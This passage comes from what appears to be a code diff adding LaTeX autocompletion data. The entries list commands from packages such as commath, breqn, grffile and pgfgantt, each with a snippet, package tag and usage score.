0.11585556755884258, + }, + { + caption: '\\coprod', + snippet: '\\coprod', + meta: 'commath-cmd', + score: 0.00011383372700282614, + }, + { + caption: '\\impliedby', + snippet: '\\impliedby', + meta: 'commath-cmd', + score: 2.3482915591834053e-5, + }, + { + caption: '\\big', + snippet: '\\big', + meta: 'commath-cmd', + score: 0.05613164277964739, + }, + { + caption: '\\idotsint', + snippet: '\\idotsint', + meta: 'commath-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\Longrightarrow', + snippet: '\\Longrightarrow', + meta: 'commath-cmd', + score: 0.002459139437356601, + }, + { + caption: '\\allowdisplaybreaks', + snippet: '\\allowdisplaybreaks', + meta: 'commath-cmd', + score: 0.005931777024772073, + }, + { + caption: '\\eqref{}', + snippet: '\\eqref{$1}', + meta: 'commath-cmd', + score: 0.06345266254167037, + }, + { + caption: '\\mod', + snippet: '\\mod', + meta: 'commath-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\mod{}', + snippet: '\\mod{$1}', + meta: 'commath-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\arraystretch', + snippet: '\\arraystretch', + meta: 'commath-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\arraystretch{}', + snippet: '\\arraystretch{$1}', + meta: 'commath-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\bigg', + snippet: '\\bigg', + meta: 'commath-cmd', + score: 0.04318078602869565, + }, + { + caption: '\\underset{}{}', + snippet: '\\underset{$1}{$2}', + meta: 'commath-cmd', + score: 0.012799893214578391, + }, + { + caption: '\\dotsc', + snippet: '\\dotsc', + meta: 'commath-cmd', + score: 0.0008555101484119994, + }, + { + caption: '\\doteq', + snippet: '\\doteq', + meta: 'commath-cmd', + score: 3.164631070474435e-5, + }, + { + caption: '\\leftroot{}', + snippet: '\\leftroot{$1}', + meta: 'commath-cmd', + score: 6.625561928497235e-5, + }, + { + caption: '\\substack{}', + snippet: '\\substack{$1}', + meta: 'commath-cmd', + score: 0.0037482529712850755, + }, + { + caption: '\\Hat{}', + snippet: '\\Hat{$1}', + meta: 'commath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\frac{}{}', + snippet: '\\frac{$1}{$2}', + meta: 'commath-cmd', + score: 1.4341091141105058, + }, + { + caption: '\\mspace{}', + snippet: '\\mspace{$1}', + meta: 'commath-cmd', + score: 3.423236656565836e-5, + }, + { + caption: '\\Bar{}', + snippet: '\\Bar{$1}', + meta: 'commath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\Grave{}', + snippet: '\\Grave{$1}', + meta: 'commath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\implies', + snippet: '\\implies', + meta: 'commath-cmd', + score: 0.021828316911576096, + }, + { + caption: '\\tbinom', + snippet: '\\tbinom', + meta: 'commath-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\dotsi', + snippet: '\\dotsi', + meta: 'commath-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\bigwedge', + snippet: '\\bigwedge', + meta: 'commath-cmd', + score: 0.000347742918592393, + }, + { + caption: '\\sideset{}{}', + snippet: '\\sideset{$1}{$2}', + meta: 'commath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\smash{}', + snippet: '\\smash{$1}', + meta: 'commath-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\smash[]{}', + snippet: '\\smash[$1]{$2}', + meta: 'commath-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\colon', + snippet: '\\colon', + meta: 'commath-cmd', + score: 0.005300291684408929, + }, + { + caption: '\\intertext{}', + snippet: '\\intertext{$1}', + meta: 'commath-cmd', + score: 0.0016148076375871775, + }, + { + caption: '\\Longleftarrow', + snippet: '\\Longleftarrow', + meta: 'commath-cmd', + score: 8.477207854183949e-5, + }, + { + caption: '\\prod', + snippet: '\\prod', + meta: 'commath-cmd', + score: 0.02549889375975901, + }, + { + caption: '\\AmS', + snippet: '\\AmS', + meta: 'commath-cmd', + score: 0.00047859486202980376, + }, + { + caption: '\\overline{}', + snippet: '\\overline{$1}', + meta: 'commath-cmd', + score: 0.11280487530505384, + }, + { + caption: '\\tfrac{}{}', + snippet: '\\tfrac{$1}{$2}', + meta: 'commath-cmd', + score: 0.0005923542426657187, + }, + { + caption: '\\uproot{}', + snippet: '\\uproot{$1}', + meta: 'commath-cmd', + score: 6.625561928497235e-5, + }, + { + caption: '\\bmod', + snippet: '\\bmod', + meta: 'commath-cmd', + score: 0.002022594681005002, + }, + { + caption: '\\bmod{}', + snippet: '\\bmod{$1}', + meta: 'commath-cmd', + score: 0.002022594681005002, + }, + { + caption: '\\pod{}', + snippet: '\\pod{$1}', + meta: 'commath-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\label{}', + snippet: '\\label{$1}', + meta: 'commath-cmd', + score: 1.897791904799601, + }, + { + caption: '\\longrightarrow', + snippet: '\\longrightarrow', + meta: 'commath-cmd', + score: 0.013399422292458848, + }, + { + caption: '\\xleftarrow[]{}', + snippet: '\\xleftarrow[$1]{$2}', + meta: 'commath-cmd', + score: 3.5779964196240445e-5, + }, + { + caption: '\\xleftarrow{}', + snippet: '\\xleftarrow{$1}', + meta: 'commath-cmd', + score: 3.5779964196240445e-5, + }, + { + caption: '\\mathaccentV', + snippet: '\\mathaccentV', + meta: 'commath-cmd', + score: 6.216218551413489e-5, + }, + { + caption: '\\hdotsfor{}', + snippet: '\\hdotsfor{$1}', + meta: 'commath-cmd', + score: 0.00024247684499275043, + }, + { + caption: '\\hdotsfor[]{}', + snippet: '\\hdotsfor[$1]{$2}', + meta: 'commath-cmd', + score: 0.00024247684499275043, + }, + { + caption: '\\Bigg', + snippet: '\\Bigg', + meta: 'commath-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\Bigg[]', + snippet: '\\Bigg[$1]', + meta: 'commath-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\overset{}{}', + snippet: '\\overset{$1}{$2}', + meta: 'commath-cmd', + score: 0.007611544955294224, + }, + { + caption: '\\Big', + snippet: '\\Big', + meta: 'commath-cmd', + score: 0.050370758781422345, + }, + { + caption: '\\longleftrightarrow', + snippet: '\\longleftrightarrow', + meta: 'commath-cmd', + score: 0.0002851769278703356, + }, + { + caption: '\\Longleftrightarrow', + snippet: '\\Longleftrightarrow', + meta: 'commath-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\Longleftrightarrow{}', + snippet: '\\Longleftrightarrow{$1}', + meta: 'commath-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\binom{}{}', + snippet: '\\binom{$1}{$2}', + meta: 'commath-cmd', + score: 0.013010882180364367, + }, + { + caption: '\\longleftarrow', + snippet: '\\longleftarrow', + meta: 'commath-cmd', + score: 0.0011096532692473691, + }, + { + caption: '\\dbinom{}{}', + snippet: '\\dbinom{$1}{$2}', + meta: 'commath-cmd', + score: 0.006800272303210672, + }, + { + caption: '\\Tilde{}', + snippet: '\\Tilde{$1}', + meta: 'commath-cmd', + score: 7.874446783586035e-5, + }, + { + caption: '\\bigcup', + snippet: '\\bigcup', + meta: 'commath-cmd', + score: 0.0058847868741168765, + }, + { + caption: '\\sinh', + snippet: '\\sinh', + meta: 'commath-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\sinh{}', + snippet: '\\sinh{$1}', + meta: 'commath-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\operatorname{}', + snippet: '\\operatorname{$1}', + meta: 'commath-cmd', + score: 0.02181954887028883, + }, + { + caption: '\\max', + snippet: '\\max', + meta: 'commath-cmd', + score: 0.04116833357968482, + }, + { + caption: '\\liminf', + snippet: '\\liminf', + meta: 'commath-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\liminf{}', + snippet: '\\liminf{$1}', + meta: 'commath-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\operatornamewithlimits{}', + snippet: '\\operatornamewithlimits{$1}', + meta: 'commath-cmd', + score: 0.0022415507993352067, + }, + { + caption: '\\exp', + snippet: '\\exp', + meta: 'commath-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\exp{}', + snippet: '\\exp{$1}', + meta: 'commath-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\lim', + snippet: '\\lim', + meta: 'commath-cmd', + score: 0.05285123457928509, + }, + { + caption: '\\sin', + snippet: '\\sin', + meta: 'commath-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\sin{}', + snippet: '\\sin{$1}', + meta: 'commath-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\arg', + snippet: '\\arg', + meta: 'commath-cmd', + score: 0.007190995792600074, + }, + { + caption: '\\cos', + snippet: '\\cos', + meta: 'commath-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\cos{}', + snippet: '\\cos{$1}', + meta: 'commath-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\varliminf', + snippet: '\\varliminf', + meta: 'commath-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\hom', + snippet: '\\hom', + meta: 'commath-cmd', + score: 8.180643329881783e-5, + }, + { + caption: '\\tan', + snippet: '\\tan', + meta: 'commath-cmd', + score: 0.006176447465423192, + }, + { + caption: '\\det', + snippet: '\\det', + meta: 'commath-cmd', + score: 0.005640718203101287, + }, + { + caption: '\\ln', + snippet: '\\ln', + meta: 'commath-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\ln{}', + snippet: '\\ln{$1}', + meta: 'commath-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\cosh', + snippet: '\\cosh', + meta: 'commath-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\cosh{}', + snippet: '\\cosh{$1}', + meta: 'commath-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\gcd', + snippet: '\\gcd', + meta: 'commath-cmd', + score: 0.002254008371792865, + }, + { + caption: '\\limsup', + snippet: '\\limsup', + meta: 'commath-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\limsup{}', + snippet: '\\limsup{$1}', + meta: 'commath-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\inf', + snippet: '\\inf', + meta: 'commath-cmd', + score: 0.00340470256994063, + }, + { + caption: '\\arccos', + snippet: '\\arccos', + meta: 'commath-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\arccos{}', + snippet: '\\arccos{$1}', + meta: 'commath-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\ker', + snippet: '\\ker', + meta: 'commath-cmd', + score: 0.002475379242338094, + }, + { + caption: '\\cot', + snippet: '\\cot', + meta: 'commath-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\cot{}', + snippet: '\\cot{$1}', + meta: 'commath-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\coth{}', + snippet: '\\coth{$1}', + meta: 'commath-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\coth', + snippet: '\\coth', + meta: 'commath-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\varlimsup', + snippet: '\\varlimsup', + meta: 'commath-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\log', + snippet: '\\log', + meta: 'commath-cmd', + score: 0.048131780413380156, + }, + { + caption: '\\varinjlim', + snippet: '\\varinjlim', + meta: 'commath-cmd', + score: 0.000361814283649031, + }, + { + caption: '\\deg', + snippet: '\\deg', + meta: 'commath-cmd', + score: 0.005542465148816408, + }, + { + caption: '\\arctan', + snippet: '\\arctan', + meta: 'commath-cmd', + score: 0.0011971697553682045, + }, + { + caption: '\\dim', + snippet: '\\dim', + meta: 'commath-cmd', + score: 0.0038210003967178293, + }, + { + caption: '\\min', + snippet: '\\min', + meta: 'commath-cmd', + score: 0.03051120054363316, + }, + { + caption: '\\Pr', + snippet: '\\Pr', + meta: 'commath-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\Pr[]', + snippet: '\\Pr[$1]', + meta: 'commath-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\tanh', + snippet: '\\tanh', + meta: 'commath-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\tanh{}', + snippet: '\\tanh{$1}', + meta: 'commath-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\arcsin', + snippet: '\\arcsin', + meta: 'commath-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\arcsin{}', + snippet: '\\arcsin{$1}', + meta: 'commath-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\DeclareMathOperator{}{}', + snippet: '\\DeclareMathOperator{$1}{$2}', + meta: 'commath-cmd', + score: 0.029440493885398676, + }, + { + caption: '\\csc', + snippet: '\\csc', + meta: 'commath-cmd', + score: 0.00013963711107573638, + }, + { + caption: '\\sup', + snippet: '\\sup', + meta: 'commath-cmd', + score: 0.009355514755312534, + }, + { + caption: '\\sec', + snippet: '\\sec', + meta: 'commath-cmd', + score: 0.0005912636157903734, + }, + { + caption: '\\varprojlim', + snippet: '\\varprojlim', + meta: 'commath-cmd', + score: 0.0004286136584068833, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'commath-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'commath-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'commath-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'commath-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'commath-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'commath-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'commath-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'commath-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\text{}', + snippet: '\\text{$1}', + meta: 'commath-cmd', + score: 0.3608680734736821, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'commath-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'commath-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\frenchspacing', + snippet: '\\frenchspacing', + meta: 'commath-cmd', + score: 0.0063276692758974925, + }, + ], + breqn: [ + { + caption: '\\biggl', + snippet: '\\biggl', + meta: 'breqn-cmd', + score: 0.0016066581118686831, + }, + { + caption: '\\biggl[]', + snippet: '\\biggl[$1]', + meta: 'breqn-cmd', + score: 0.0016066581118686831, + }, + { + caption: '\\Bigg', + snippet: '\\Bigg', + meta: 'breqn-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\Bigg[]', + snippet: '\\Bigg[$1]', + meta: 'breqn-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\end{}', + snippet: '\\end{$1}', + meta: 'breqn-cmd', + score: 7.847906405228455, + }, + { + caption: '\\Big', + snippet: '\\Big', + meta: 'breqn-cmd', + score: 0.050370758781422345, + }, + { + caption: '\\bigg', + snippet: '\\bigg', + meta: 'breqn-cmd', + score: 0.04318078602869565, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'breqn-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'breqn-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'breqn-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'breqn-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'breqn-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'breqn-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'breqn-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'breqn-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'breqn-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'breqn-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'breqn-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'breqn-cmd', + score: 0.2864294797053033, + }, + ], + ClearSans: [ + { + caption: '\\RequireXeTeX', + snippet: '\\RequireXeTeX', + meta: 'ClearSans-cmd', + score: 0.00021116765384691477, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'ClearSans-cmd', + score: 0.008565354665444157, + }, + ], + ccicons: [ + { + caption: '\\ccbynd', + snippet: '\\ccbynd', + meta: 'ccicons-cmd', + score: 0.0002103469673225986, + }, + { + caption: '\\ccbysa', + snippet: '\\ccbysa', + meta: 'ccicons-cmd', + score: 0.00016986782584471025, + }, + ], + varioref: [ + { + caption: '\\csname', + snippet: '\\csname', + meta: 'varioref-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\vref', + snippet: '\\vref{$1}', + meta: 'vref-cmd', + score: 0.008565354665444157, + }, + ], + SIunits: [ + { + caption: '\\micro', + snippet: '\\micro', + meta: 'SIunits-cmd', + score: 0.011051971930487929, + }, + { + caption: '\\meter', + snippet: '\\meter', + meta: 'SIunits-cmd', + score: 0.012499244923238213, + }, + { + caption: '\\cdot', + snippet: '\\cdot', + meta: 'SIunits-cmd', + score: 0.23029085545522762, + }, + { + caption: '\\degreecelsius', + snippet: '\\degreecelsius', + meta: 'SIunits-cmd', + score: 0.002130669712103909, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'SIunits-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'SIunits-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\text{}', + snippet: '\\text{$1}', + meta: 'SIunits-cmd', + score: 0.3608680734736821, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'SIunits-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'SIunits-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\frenchspacing', + snippet: '\\frenchspacing', + meta: 'SIunits-cmd', + score: 0.0063276692758974925, + }, + ], + alltt: [ + { + caption: '\\par', + snippet: '\\par', + meta: 'alltt-cmd', + score: 0.413853376001159, + }, + ], + fancyvrb: [ + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'fancyvrb-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'fancyvrb-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\refstepcounter{}', + snippet: '\\refstepcounter{$1}', + meta: 'fancyvrb-cmd', + score: 0.002140559856649122, + }, + { + caption: '\\VerbatimEnvironment', + snippet: '\\VerbatimEnvironment', + meta: 'fancyvrb-cmd', + score: 4.5350034239275855e-5, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'fancyvrb-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\fvset{}', + snippet: '\\fvset{$1}', + meta: 'fancyvrb-cmd', + score: 0.00015476887282479622, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'fancyvrb-cmd', + score: 0.00037306820619479756, + }, + ], + textgreek: [ + { + caption: '\\temp', + snippet: '\\temp', + meta: 'textgreek-cmd', + score: 0.0003566413345844499, + }, + { + caption: '\\temp{}', + snippet: '\\temp{$1}', + meta: 'textgreek-cmd', + score: 0.0003566413345844499, + }, + ], + endnotes: [ + { + caption: '\\endnote', + snippet: '\\endnote', + meta: 'endnotes-cmd', + score: 4.002553629215439e-5, + }, + { + caption: '\\theendnotes', + snippet: '\\theendnotes', + meta: 'endnotes-cmd', + score: 0.0002788252334941383, + }, + ], + leading: [ + { + caption: '\\leading{}', + snippet: '\\leading{$1}', + meta: 'leading-cmd', + score: 0.00029077374894594517, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'leading-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\setlength{}{}', + snippet: '\\setlength{$1}{$2}', + meta: 'leading-cmd', + score: 0.354445763583904, + }, + { + caption: '\\setlength', + snippet: '\\setlength', + meta: 'leading-cmd', + score: 0.354445763583904, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'leading-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'leading-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'leading-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\setcounter{}{}', + snippet: '\\setcounter{$1}{$2}', + meta: 'leading-cmd', + score: 0.10068045662118841, + }, + { + caption: '\\addtolength{}{}', + snippet: '\\addtolength{$1}{$2}', + meta: 'leading-cmd', + score: 0.028955796305270766, + }, + { + caption: '\\addtolength', + snippet: '\\addtolength', + meta: 'leading-cmd', + score: 0.028955796305270766, + }, + ], + esvect: [ + { + caption: '\\vv', + snippet: '\\vv', + meta: 'esvect-cmd', + score: 0.003087420708479709, + }, + { + caption: '\\vv{}', + snippet: '\\vv{$1}', + meta: 'esvect-cmd', + score: 0.003087420708479709, + }, + ], + lettrine: [ + { + caption: '\\LettrineFontHook', + snippet: '\\LettrineFontHook', + meta: 'lettrine-cmd', + score: 9.103413871235853e-5, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'lettrine-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'lettrine-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'lettrine-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\lettrine[]{}{}', + snippet: '\\lettrine[$1]{$2}{$3}', + meta: 'lettrine-cmd', + score: 0.0028028146688245602, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'lettrine-cmd', + score: 0.00037306820619479756, + }, + ], + pgfopts: [ + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pgfopts-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pgfopts-cmd', + score: 0.021170869458413965, + }, + ], + tabulary: [ + { + caption: '\\arraybackslash', + snippet: '\\arraybackslash', + meta: 'tabulary-cmd', + score: 0.014532521139459619, + }, + { + caption: '\\multicolumn{}{}{}', + snippet: '\\multicolumn{$1}{$2}{$3}', + meta: 'tabulary-cmd', + score: 0.5473606021405326, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tabulary-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tabulary-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\endtabular', + snippet: '\\endtabular', + meta: 'tabulary-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\multicolumn{}{}{}', + snippet: '\\multicolumn{$1}{$2}{$3}', + meta: 'tabulary-cmd', + score: 0.5473606021405326, + }, + { + caption: '\\array{}', + snippet: '\\array{$1}', + meta: 'tabulary-cmd', + score: 2.650484574842396e-5, + }, + { + caption: '\\arraybackslash', + snippet: '\\arraybackslash', + meta: 'tabulary-cmd', + score: 0.014532521139459619, + }, + { + caption: '\\tabular{}', + snippet: '\\tabular{$1}', + meta: 'tabulary-cmd', + score: 0.0005078239917067089, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tabulary-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\newcolumntype{}[]{}', + snippet: '\\newcolumntype{$1}[$2]{$3}', + meta: 'tabulary-cmd', + score: 0.018615449342361392, + }, + { + caption: '\\newcolumntype{}{}', + snippet: '\\newcolumntype{$1}{$2}', + meta: 'tabulary-cmd', + score: 0.018615449342361392, + }, + ], + grffile: [ + { + caption: '\\RequireXeTeX', + snippet: '\\RequireXeTeX', + meta: 'grffile-cmd', + score: 0.00021116765384691477, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'grffile-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'grffile-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'grffile-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'grffile-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'grffile-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'grffile-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'grffile-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'grffile-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'grffile-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'grffile-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'grffile-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'grffile-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'grffile-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'grffile-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'grffile-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'grffile-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'grffile-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'grffile-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'grffile-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'grffile-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'grffile-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'grffile-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'grffile-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'grffile-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'grffile-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'grffile-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'grffile-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'grffile-cmd', + score: 0.021170869458413965, + }, + ], + pgfgantt: [ + { + caption: '\\gantttitlecalendar{}', + snippet: '\\gantttitlecalendar{$1}', + meta: 'pgfgantt-cmd', + score: 0.00027821409061195467, + }, + { + caption: '\\ganttset{}', + snippet: '\\ganttset{$1}', + meta: 'pgfgantt-cmd', + score: 0.0002492292297037303, + }, + { + caption: '\\gantttitlelist[]{}{}', + snippet: '\\gantttitlelist[$1]{$2}{$3}', + meta: 'pgfgantt-cmd', + score: 0.00046430963549633653, + }, + { + caption: '\\gantttitlelist{}{}', + snippet: '\\gantttitlelist{$1}{$2}', + meta: 'pgfgantt-cmd', + score: 0.00046430963549633653, + }, + { + caption: '\\ganttlink[]{}{}', + snippet: '\\ganttlink[$1]{$2}{$3}', + meta: 'pgfgantt-cmd', + score: 0.0011494045501518014, + }, + { + caption: '\\newganttchartelement{}{}', + snippet: '\\newganttchartelement{$1}{$2}', + meta: 'pgfgantt-cmd', + score: 0.00023651453263545777, + }, + { + caption: '\\gantttitle{}{}', + snippet: '\\gantttitle{$1}{$2}', + meta: 'pgfgantt-cmd', + score: 0.001804531670553746, + }, + { + caption: '\\gantttitle[]{}{}', + snippet: '\\gantttitle[$1]{$2}{$3}', + meta: 'pgfgantt-cmd', + score: 0.001804531670553746, + }, + { + caption: '\\setganttlinklabel{}{}', + snippet: '\\setganttlinklabel{$1}{$2}', + meta: 'pgfgantt-cmd', + score: 9.045112044064169e-5, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'pgfgantt-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pgfgantt-cmd', + score: 